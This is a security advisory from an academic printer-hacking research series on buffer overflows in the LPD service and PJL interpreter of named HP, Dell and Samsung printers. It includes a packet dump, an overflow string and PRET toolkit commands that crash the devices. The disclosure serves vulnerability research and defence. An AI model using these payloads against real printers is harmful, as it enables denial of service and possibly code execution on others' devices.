TL;DR: In the scope of academic research on printer security, various vulnerabilities in network printers and MFPs have been discovered. This is advisory 4 of 6 of the `Hacking Printers' series. Each advisory discusses multiple issues of the same category. This post is about buffer overflows in the printer's LPD daemon and PJL interpreter which leads to denial of service or potentially even to code execution. The attack can be performed by anyone who can print, for example through USB or network. It can even be carried out by a malicious website, using cross-site printing techniques (see http://hacking-printers.net/wiki/index.php/Cross-site_printing). ==================[ Buffer Overflow in LPD Service ]================== -------------------------[ Affected Devices ]------------------------- This vulnerability has been verfied for the devices listed below: - HP LaserJet 1200 (Firmware version: M.22.09) - HP LaserJet 4200N (Firmware version: 20050602) - HP LaserJet 4250N (Firmware version: 20150130) - Dell 3110cn (Firmware version: 200707111148) - Samsung MultiPress 6345N (Firmware: 1.03.00.81) More printers are likely to be affected. Vendors informed: 2016-10-17 --------------------[ Vulnerability Description ]--------------------- The printer's LPD service listening on port 515/tcp is prone to a buffer overflow vulnerability. Sending 150 characters or more as username operator of the control file's L command (print banner page) completely crashes the device and requires a manual restart to get the printer back to life. Given correct shellcode and return address, this vulnerability may lead to remote code execution. A packet dump is shown below. ---------------------------------------------------------------------- > 02 6c 70 0a .lp. < 00 . > 02 31 35 32 20 63 66 41 30 30 31 0a .152 cfA001. < 00 . > 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx > 78 78 78 78 78 78 78 0a 00 xxxxxxx.. ---------------------------------------------------------------------- -------------------------[ Proof of Concept ]------------------------- A Python based proof of concept software entitled Printer Exploitation Toolkit (PRET) has been published, which includes a simple LPD fuzzer to test for buffer overflows by setting all user inputs defined by the LPD protocol to a certain value (in our case, Python output). The attack can be reproduced as follows: $ git clone https://github.com/RUB-NDS/PRET.git $ cd PRET/lpd/ $ ./lpdtest.py printer in "`python -c 'print "x"*150'`" ==================[ Buffer Overflow in PJL Interpreter ]================== -------------------------[ Affected Devices ]------------------------- This vulnerability has been verfied for the devices listed below: - Dell 1720n (Firmware version: NM.NA.N099) More printers are likely to be affected. --------------------[ Vulnerability Description ]--------------------- Sending about 3.000 characters and more to the PJL interpreter crashes the device and requires a manual restart to get the printer back to life. Given correct shellcode and return address, this vulnerability might even lead to remote code execution: ---------------------------------------------------------------------- @PJL SET 000000000000000000000000000000000000000000000000000000000a| ---------------------------------------------------------------------- -------------------------[ Proof of Concept ]------------------------- A Python based proof of concept software entitled Printer Exploitation Toolkit (PRET) has been published. Testing a device buffer overflows in the PJL interpreter can be done as follows: $ cd .. $ ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood Buffer size: 10000, Sending: @PJL SET [buffer] Buffer size: 10000, Sending: @PJL [buffer] Buffer size: 10000, Sending: @PJL COMMENT [buffer] Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer] Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]" Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]" Buffer size: 10000, Sending: @PJL INFO [buffer] Buffer size: 10000, Sending: @PJL ECHO [buffer] Buffer size: 10000, Sending: @PJL INQUIRE [buffer] Buffer size: 10000, Sending: @PJL DINQUIRE [buffer] Buffer size: 10000, Sending: @PJL USTATUS [buffer] Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]" Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]" Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]" Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]" -----------------------[ Further Information ]------------------------ Information on buffer overflows in printer devices can be found at: http://hacking-printers.net/wiki/index.php/Buffer_overflows